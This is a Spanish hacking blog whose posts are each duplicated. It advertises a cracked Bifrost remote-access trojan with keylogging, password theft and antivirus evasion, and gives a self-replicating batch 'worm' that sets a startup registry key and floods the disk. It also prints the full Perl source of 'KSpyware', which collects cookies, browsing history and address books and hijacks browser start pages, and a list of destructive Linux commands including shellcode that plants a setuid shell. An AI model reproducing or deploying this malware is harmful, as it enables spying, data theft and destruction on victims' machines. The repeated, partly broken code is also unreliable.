Sign by Dealighted - Black Friday Coupons
viernes, 2 de enero de 2009
Biefrost
Ya esta corriendo por la red la version 1.2d del bifrost, supuestamente es una modificacion de la version 1.2c, version privada y oficial creada por KSV, que estaba a la venta por unos 200 dolares.Alguien se quejo de que la detectaban algunos avs y la publico...Dentro de todo lo que mas se destaca con respecto a versiones anteriores es el "file manager", se le agregaron muchisimas mejoras.Tambien el server ahora corre en windows vista 64 bits y es mas indetectable, aunque no creo que dure mucho tiempo, como paso con la version 1.2b.
Mejoras no oficiales por troyanosyvirus.com.ar:
-Mejoras en la ocultacion:
Indetectable a algunos antivirus y a todos los antivirus desactualizados hace unos meses.
Mejorado el sistema de salteo de firewall.
-Mejoras en la gestion de archivos:
Agregado gestor de descargas, permite cancelar, pausar, mover arriba, abajo, etc.
Aumentada la velocidad y estabilidad de las descargas.
Guarda datos en cache.
Permite ver vistas en miniaturas en imagenes jpg.
Agregada opcion para disminuir la velocidad de descarga asi se aumenta el ancho de banda.
Agregada opcion para reproducir sonidos con volumen maximo y por defecto.
Agregada vista "Treeview"
-Otras mejoras
El server corre en windows vista 64 bits, aunque el keylogger todabia sigue sin funcionar en este SO.
Agregada captura del clipboard en el keylogger.
Mejorada la estabilidad en el metodo de inicio activex.
Nueva columna en el cliente que muestra la ventana activa en cada victima.
Los datos de antivirus y firewall se extraen del centro de seguridad de windows.
Agregada funcion para captura de password de firefox 2.
-->Descargar<--
Mejoras no oficiales por troyanosyvirus.com.ar:
-Mejoras en la ocultacion:
Indetectable a algunos antivirus y a todos los antivirus desactualizados hace unos meses.
Mejorado el sistema de salteo de firewall.
-Mejoras en la gestion de archivos:
Agregado gestor de descargas, permite cancelar, pausar, mover arriba, abajo, etc.
Aumentada la velocidad y estabilidad de las descargas.
Guarda datos en cache.
Permite ver vistas en miniaturas en imagenes jpg.
Agregada opcion para disminuir la velocidad de descarga asi se aumenta el ancho de banda.
Agregada opcion para reproducir sonidos con volumen maximo y por defecto.
Agregada vista "Treeview"
-Otras mejoras
El server corre en windows vista 64 bits, aunque el keylogger todabia sigue sin funcionar en este SO.
Agregada captura del clipboard en el keylogger.
Mejorada la estabilidad en el metodo de inicio activex.
Nueva columna en el cliente que muestra la ventana activa en cada victima.
Los datos de antivirus y firewall se extraen del centro de seguridad de windows.
Agregada funcion para captura de password de firefox 2.
-->Descargar<--
martes, 30 de diciembre de 2008
Gusano
Se reproduce millones de veces, cada vez que enciendes el pc.
A guardar en .bat
Como todos :D
@echo off
copy %0%windir%\\system32\\worm.bat
REG ADD HKLM\\software\\microsoft\\windows\\currentversion \\run /v hack
/d %windir%\\system32\\worm.bat
:worm
cd\\
cd %homepatch%
cd escritorio
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
cd\\
cd windows
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
goto worm
A guardar en .bat
Como todos :D
@echo off
copy %0%windir%\\system32\\worm.bat
REG ADD HKLM\\software\\microsoft\\windows\\currentversion \\run /v hack
/d %windir%\\system32\\worm.bat
:worm
cd\\
cd %homepatch%
cd escritorio
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
cd\\
cd windows
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
mkdir %ramdom%
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
echo worm %ramdom%.exe
goto worm
sábado, 27 de diciembre de 2008
Comandos Linux
Linux tampoco esta libre de usuarios malintencionados y si eres nuevo en este entorno no esta de mas que conozcas estas cosas. Existen comandos que no es recomendable ejecutar en nuestro sistema o evitar ejecutar si estan contenidos dentro de shell scripts. Yo siempre digo que no hagais Copy & Paste al tuntun de comandos, o si os bajais algun script de un sitio que no conozcais, lo editeis al menos antes y echeis un vistazo a su contenido para evitar luego males mayores.
Algunos de estos comandos “peligrosos” son:
1. rm -rf /
Este comando borra recursivamente todos los ficheros almacenados en el directorio root. Vendria a ser el equivalente (mas o menos) a un FORMAT C: en Windows.
2.
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.
3. mkfs.ext3 /dev/sda
Formatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).
4. :(){::&};:
Conocido tambien como forkbomb, Este comando comenzara a crear y ejecutar un elevado numero de procesos en el sistema hasta que este se bloquee.
5. cualquier_comando > /dev/sda
Sobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la perdida total de datos.
6. wget http://alguna_url -O- sh
Este comando descargara un fichero ejecutable o script y lo ejecutara. Si el sitio no es confiable podria ser contenido malicioso.
7. mv /home/tu_usuario/* /dev/null
Mueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).
De http://ubuntulife.wordpress.com
Algunos de estos comandos “peligrosos” son:
1. rm -rf /
Este comando borra recursivamente todos los ficheros almacenados en el directorio root. Vendria a ser el equivalente (mas o menos) a un FORMAT C: en Windows.
2.
char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
Esta es el mismo comando que el anterior, pero escrito en su forma hexadecimal.
3. mkfs.ext3 /dev/sda
Formatea el sistema de archivos que se encuentra en /dev/sda (que generalmente es nuestro disco duro).
4. :(){::&};:
Conocido tambien como forkbomb, Este comando comenzara a crear y ejecutar un elevado numero de procesos en el sistema hasta que este se bloquee.
5. cualquier_comando > /dev/sda
Sobreescribe el dispositivo de bloques (/dev/sda) con la salida del comando ejecutado, generalmente borrando el contenido actual del dispositivo y provocado la perdida total de datos.
6. wget http://alguna_url -O- sh
Este comando descargara un fichero ejecutable o script y lo ejecutara. Si el sitio no es confiable podria ser contenido malicioso.
7. mv /home/tu_usuario/* /dev/null
Mueve todas las carpetas de tu home a /dev/null, lo que provoca que sean borradas (eliminadas).
De http://ubuntulife.wordpress.com
viernes, 26 de diciembre de 2008
Descargas simultaneas en Rapidshare
Con esta sencilla aplicación podrás descargar varios ficheros a la vez.
Para descargar archivos simplemente debemos colocar el link de rapidshare donde dice rapidshare url y poner go, y nos saldra la pagina de rapidshare como si estuvieramos conectado con otra ip, y a partir de ahy seguimos los pasos tipicos para descargar de rapidshare.
-->Descargar<--
Para descargar archivos simplemente debemos colocar el link de rapidshare donde dice rapidshare url y poner go, y nos saldra la pagina de rapidshare como si estuvieramos conectado con otra ip, y a partir de ahy seguimos los pasos tipicos para descargar de rapidshare.
-->Descargar<--
Crear spyware
Lo interesante de este texto que está por Internet es el código fuente.
Respecto a protegerte del spyware, puede leerse este artículo:
http://www.microsoft.com/latam/technet/seguridad/articulos/adware.asp
Los spyware en si tienen una similitud con los virus, pero a diferencia del virus el spyware no tienen codigo dañino para nuestros ordenadores, por esta razon nuestros antivirus no se pueden encargar de reconocerlos y eliminarlos.
Entonces podemos decir que los spyware son como pequeños programas que se instalan en nuestro ordenador y espian nuestros datos y lo que hacemos en la red con el unico fin de enviar esa informacion espiada a empresas de publicidad en la internet, con esos datos esas empresas puede comerzialisar y incluso regresar spam por correo electronico. El spyware trabajaa en background es decir en modo de [segundo plano] esto lo hacen con el proposito de no nos demos cuenta de que el esta ahi hasta que aparezca el primer sintoma.
Si tenemos spywares en nuestro ordenador es peligroso, porque al espiar pueden encontrar, tu direccion de correo electronico e incluso su password. Al tenerlo los espias podrian floodeart de spam. Direcciones de ip y DNS, telefono, pais, paginas que visitas y algunos websites que te interesen, es decir todo lo que hagas en la red podria ser espiado por ellos. Para mi lo mas peligroso es que ellos pueden saber lo que tu compras en la red, y al comprar necesitas o una CC [Tarjeta de Credito] o una CB [Cuenta Bancaria], al ingresar estos datos podrian ser capturados por los spywares.
Los spywares mas comunes que puedan ingresar en tu ordenador son los siguientes: AdSofware, Alexa, Cydoors, Gator, Web3000, Webhancer, CoolWebSearch, BlazeFind.Bridge, Xupiter, Hotbar, Kazaa etc....
Alguno de los sintomas mas comunes que siente nuestro ordenador cuando obtiene spyware pueden ser los siguentes:
[] Nuevas paginas favoritas agregadas a la lista de tu explorador.
[] Errores de navegacion en tu explorador.
[] Paginas de inicio modificadas, y/o cambiadas a otras.
[] Comienzan a aparecernos pop ups a lo loco. Aun sin estar conectado, y sin tener el explorer abierto.
[] Las famosas tool bars o search bars comienzan a aparecer.
[] Nuevos botones, y utilidades se bajan, como junk soft o programas basura.
[] Notas el incremente de porn websites ves porno a menudo, y incluso en tu ordenador aparecen, el mas comun es el HotTartz.
[] La velocidad de tu tu navegador varia.
Para protegernos antes estos espias necesitamos armarnos de software que los repela y los elimine. Estos software son muy facil de encontrar, ademas son freeware. Ahora les dejare una lista de donde descargarnos los mas comunes y mas utiles.
SpyBlaster 3.3 [2.5MB]
http://securityhelpers.net/downloads/spywareblastersetup33.exe
SpyBot Search & Destroy 1.3 [4.6MB]
http://tucows.wau.nl/files/spybotsd13.exe
Adware SE Tweak SE [0.5MB]
http://download.lavasoft.de.edgesuite.net/public/pltweakse.exe
HijackThis 1.9.91 [0.1MB]
http://merijn.arwinianos.net/HijackThis.exe
Si necesitas una lista mucho mas amplia porfavor ve a la siguiente direccion: http://www.elhacker.net/seguridad.htm#A%20n%20t%20i%20%20-%20%20W%20o%20r%20m%20s
Ahora lo mas impresionante en este pequeño articulo, es que posee el primer codigo abierto de un spyware, los codigos de los spywares casi nunca son vistos.
Este me lo encontre en Kspyware una nueva web la cual fue echa con el unico proposito de sacar a luz un spyware echo en perl http://nzeka-labs.com/hacking/KSpyware.htm
KSpyware es el primer open source spyware accesible en la net.
Aqui les dejo el codigo fuente de KSpyware el cual esta hecho en Perl:
Código:
############################################
### KSpyware v0.1 for educational purpose ###############
############################################
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;
############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################
sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";
opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";
print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}
#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################
sub indexsites {
my $name;
$name=Win32::LoginName();
$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
}
########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################
sub mails {
my $name;
$name=Win32::LoginName();
$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);
}
#####################################
### Hijack IE by modifying the main page ##########
#####################################
sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};
$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}
#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################
sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}
###################
### Entry point !!! #######
###################
$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";
programfiles();
indexsites();
mails();
mainpage();
pub();
exit 0;
Ahora les explicare para que sirve cada modulo de este codigo en perl.
Con este codigo obtendremos una lista de programas instalados en el sistema.
Código:
############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################
sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";
opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";
print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}
Con este codigo obtendremos las direcciones URL que la victima a visitado, tambien tendremos las cookies.
Código:
#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################
sub indexsites {
my $name;
$name=Win32::LoginName();
$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
}
Con este codigo obtendremos direcciones de correo electronico para poder hacer spam...
Código:
########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################
sub mails {
my $name;
$name=Win32::LoginName();
$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);
}
Con este codigo sabotearemos el IE explorer para cambiar la pagina de inicio.
Código:
#####################################
### Hijack IE by modifying the main page ##########
#####################################
sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};
$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}
Para utilizar este codigo necesitamos que el Net Send este activado, asi podemos enviar anuncioes etx es como spam.
Código:
#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################
sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}
Y con este el entry point...
Código:
###################
### Entry point !!! #######
###################
$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";
programfiles();
indexsites();
mails();
mainpage();
pub();
exit 0;
-----------------------------------------------------------------------------
Basandonos en el codigo podemos crear nuestro propio spyware, aqui la prueba
Código:
***********************************************
*****[http://nobanet.xternal-host.com/ SpyWare]************************
***********************************************
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;
En Perl seria asi para sabotear el IE
Con esto sabotearemos el IE y hacerlo que nos redireccione la pagina principal a www.elhacker.net
Código:
***********************************************
*****Sabotear IE Explorer. Pagina Principal.***
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Internet Explorer"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
Con esto sabotearemos el mozilla y hacerlo que nos redireccione la pagina principal a www.elhacker.net
Código:
***********************************************
*****Sabotear Mozilla. Pagina Principal.*******
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Mozilla Firefox"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
Entonces claro como no se muxo Perl me estoy basando en el codigo anterior. Entonces mas o menos esto llevariamos, el spyware nos cambiaria la pagina principal de el IE y del Mozilla.
Código:
***********************************************
*****[http://nobanet.xternal-host.com/ SpyWare]************************
***********************************************
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;
***********************************************
*****Sabotear IE Explorer. Pagina Principal.***
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Internet Explorer"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/t", "REG_SZ" ];
***********************************************
*****Sabotear Mozilla. Pagina Principal.*******
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Mozilla Firefox"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= ["http://nobanet.xternal-host.com/", "REG_SZ" ];
No quiero entrar en tantos datos porque el perl no es mi lenguaje jeje y la verdad no soy programador, se ahi un poco de FORTRAN, COBOL, C pero pues el resto de lenguajes lo que se es lo basico, pero claro con este codigo y un poco de imaginacion podemos hacer mucho.
Cedido por P3t3rp4n
Comentarios, d su blog:
Para hacerlo funcionar:
Pues el código perl, tendrías que descargarte el intérprete (Active Perl) e instalarlo. Después te metes en el directorio en el que lo has instalado y pones perl [nombre del archivo] para ejecutarlo. De todos modos, el código es tan solo una prueba de concepto; actúa sobre tu propio ordenador, no en remoto, y además es código fragmentario de como acceder a los datos, no lo manda ni lo utiliza...
Aquí tienes un manual de pearl, pero sin unas bases sólidas de informática, esto requiere demasiado tiempo y normalmente pocos resultados:
http://www.manualesutiles.com/manuales/Manual%20de%20pearl.zip
Respecto a protegerte del spyware, puede leerse este artículo:
http://www.microsoft.com/latam/technet/seguridad/articulos/adware.asp
Los spyware en si tienen una similitud con los virus, pero a diferencia del virus el spyware no tienen codigo dañino para nuestros ordenadores, por esta razon nuestros antivirus no se pueden encargar de reconocerlos y eliminarlos.
Entonces podemos decir que los spyware son como pequeños programas que se instalan en nuestro ordenador y espian nuestros datos y lo que hacemos en la red con el unico fin de enviar esa informacion espiada a empresas de publicidad en la internet, con esos datos esas empresas puede comerzialisar y incluso regresar spam por correo electronico. El spyware trabajaa en background es decir en modo de [segundo plano] esto lo hacen con el proposito de no nos demos cuenta de que el esta ahi hasta que aparezca el primer sintoma.
Si tenemos spywares en nuestro ordenador es peligroso, porque al espiar pueden encontrar, tu direccion de correo electronico e incluso su password. Al tenerlo los espias podrian floodeart de spam. Direcciones de ip y DNS, telefono, pais, paginas que visitas y algunos websites que te interesen, es decir todo lo que hagas en la red podria ser espiado por ellos. Para mi lo mas peligroso es que ellos pueden saber lo que tu compras en la red, y al comprar necesitas o una CC [Tarjeta de Credito] o una CB [Cuenta Bancaria], al ingresar estos datos podrian ser capturados por los spywares.
Los spywares mas comunes que puedan ingresar en tu ordenador son los siguientes: AdSofware, Alexa, Cydoors, Gator, Web3000, Webhancer, CoolWebSearch, BlazeFind.Bridge, Xupiter, Hotbar, Kazaa etc....
Alguno de los sintomas mas comunes que siente nuestro ordenador cuando obtiene spyware pueden ser los siguentes:
[] Nuevas paginas favoritas agregadas a la lista de tu explorador.
[] Errores de navegacion en tu explorador.
[] Paginas de inicio modificadas, y/o cambiadas a otras.
[] Comienzan a aparecernos pop ups a lo loco. Aun sin estar conectado, y sin tener el explorer abierto.
[] Las famosas tool bars o search bars comienzan a aparecer.
[] Nuevos botones, y utilidades se bajan, como junk soft o programas basura.
[] Notas el incremente de porn websites ves porno a menudo, y incluso en tu ordenador aparecen, el mas comun es el HotTartz.
[] La velocidad de tu tu navegador varia.
Para protegernos antes estos espias necesitamos armarnos de software que los repela y los elimine. Estos software son muy facil de encontrar, ademas son freeware. Ahora les dejare una lista de donde descargarnos los mas comunes y mas utiles.
SpyBlaster 3.3 [2.5MB]
http://securityhelpers.net/downloads/spywareblastersetup33.exe
SpyBot Search & Destroy 1.3 [4.6MB]
http://tucows.wau.nl/files/spybotsd13.exe
Adware SE Tweak SE [0.5MB]
http://download.lavasoft.de.edgesuite.net/public/pltweakse.exe
HijackThis 1.9.91 [0.1MB]
http://merijn.arwinianos.net/HijackThis.exe
Si necesitas una lista mucho mas amplia porfavor ve a la siguiente direccion: http://www.elhacker.net/seguridad.htm#A%20n%20t%20i%20%20-%20%20W%20o%20r%20m%20s
Ahora lo mas impresionante en este pequeño articulo, es que posee el primer codigo abierto de un spyware, los codigos de los spywares casi nunca son vistos.
Este me lo encontre en Kspyware una nueva web la cual fue echa con el unico proposito de sacar a luz un spyware echo en perl http://nzeka-labs.com/hacking/KSpyware.htm
KSpyware es el primer open source spyware accesible en la net.
Aqui les dejo el codigo fuente de KSpyware el cual esta hecho en Perl:
Código:
############################################
### KSpyware v0.1 for educational purpose ###############
############################################
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;
############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################
sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";
opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";
print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}
#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################
sub indexsites {
my $name;
$name=Win32::LoginName();
$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
}
########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################
sub mails {
my $name;
$name=Win32::LoginName();
$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);
}
#####################################
### Hijack IE by modifying the main page ##########
#####################################
sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};
$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}
#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################
sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}
###################
### Entry point !!! #######
###################
$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";
programfiles();
indexsites();
mails();
mainpage();
pub();
exit 0;
Ahora les explicare para que sirve cada modulo de este codigo en perl.
Con este codigo obtendremos una lista de programas instalados en el sistema.
Código:
############################################
### With the code below, we can obtain the installed #########
### programs on the system #########################
############################################
sub programfiles{
open(PF, '>C:\\spy\\pf.txt')
or die "I can't open the file\n";
opendir(PROGRAMFILES, 'C:\\Program Files\\')
or die "A problem occured.";
print PF join(' - ', readdir(PROGRAMFILES));
closedir PRGRAMFILES;
close PF;
}
Con este codigo obtendremos las direcciones URL que la victima a visitado, tambien tendremos las cookies.
Código:
#########################################
### With the code below, we can obtain the urls #########
### the victim visited and the cookies ################
#########################################
sub indexsites {
my $name;
$name=Win32::LoginName();
$from = "C:\\WINNT\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\WinntTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\WINNT\\Cookies\\index.dat";
$to = "C:\\spy\\WinntCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Local Settings\\Temporary Internet Files\\Content.IE5\\index.dat";
$to = "C:\\spy\\LocalTifIndex.dat";
Win32::CopyFile($from, $to, 0);
$from = "C:\\Documents and Settings\\" . $name .
"\\Cookies\\index.dat";
$to = "C:\\spy\\LocalCookiesIndex.dat";
Win32::CopyFile($from, $to, 0);
}
Con este codigo obtendremos direcciones de correo electronico para poder hacer spam...
Código:
########################################
### With the code below, we can obtain a list of ########
### e-mails adresses (for spam...) #################
#######################################
sub mails {
my $name;
$name=Win32::LoginName();
$from = "C:\\Documents and Settings\\" . $name .
"\\Application Data\\Microsoft\\Address Book\\" . $name . ".wab";
$to = "C:\\spy\\" . $name . ".wab";
Win32::CopyFile($from, $to, 0);
}
Con este codigo sabotearemos el IE explorer para cambiar la pagina de inicio.
Código:
#####################################
### Hijack IE by modifying the main page ##########
#####################################
sub mainpage {
$userKey= $Registry->
{"CUser/Software/Microsoft/Internet Explorer/"};
$userKey->{"Main//Start Page"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://www.nzeka-labs.com", "REG_SZ" ];
}
Para utilizar este codigo necesitamos que el Net Send este activado, asi podemos enviar anuncioes etx es como spam.
Código:
#########################################
### With the code below, Net Send is used to spam #######
### or send ads to the user (Net Send must be activated)####
#########################################
sub pub {
$NetSend->Send(
to => "127.0.0.1",
message => "Here, a small ad in order to earn money or to spam!!!");
}
Y con este el entry point...
Código:
###################
### Entry point !!! #######
###################
$dir = "C:\\spy\\";
mkdir $dir or die "An error occured\n";
programfiles();
indexsites();
mails();
mainpage();
pub();
exit 0;
-----------------------------------------------------------------------------
Basandonos en el codigo podemos crear nuestro propio spyware, aqui la prueba
Código:
***********************************************
*****[http://nobanet.xternal-host.com/ SpyWare]************************
***********************************************
use Win32;
use File::Xcopy qw(xcopy);
use Win32::TieRegistry ( Delimiter=>"/", ArrayValues=>1 );
use Win32::NetSend;
En Perl seria asi para sabotear el IE
Con esto sabotearemos el IE y hacerlo que nos redireccione la pagina principal a www.elhacker.net
Código:
***********************************************
*****Sabotear IE Explorer. Pagina Principal.***
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Internet Explorer"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
Con esto sabotearemos el mozilla y hacerlo que nos redireccione la pagina principal a www.elhacker.net
Código:
***********************************************
*****Sabotear Mozilla. Pagina Principal.*******
***********************************************
sub mainpage {
$userKey= $Registry->
{"CUser/Archivos de programa\Mozilla Firefox"};
$userKey->{"Main//Start Page"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
$userKey->{"Main//Start Page_bak"}= [ "http://nobanet.xternal-host.com/", "REG_SZ" ];
Entonces claro como no se muxo Perl me estoy basando en el codigo anterior. Entonces mas o menos esto llevariamos, el spyware nos cambiaria la pagina principal de el IE y del Mozilla.
Código:
***********************************************
*****[http://nobanet.xternal-host.com/ SpyWare]************************
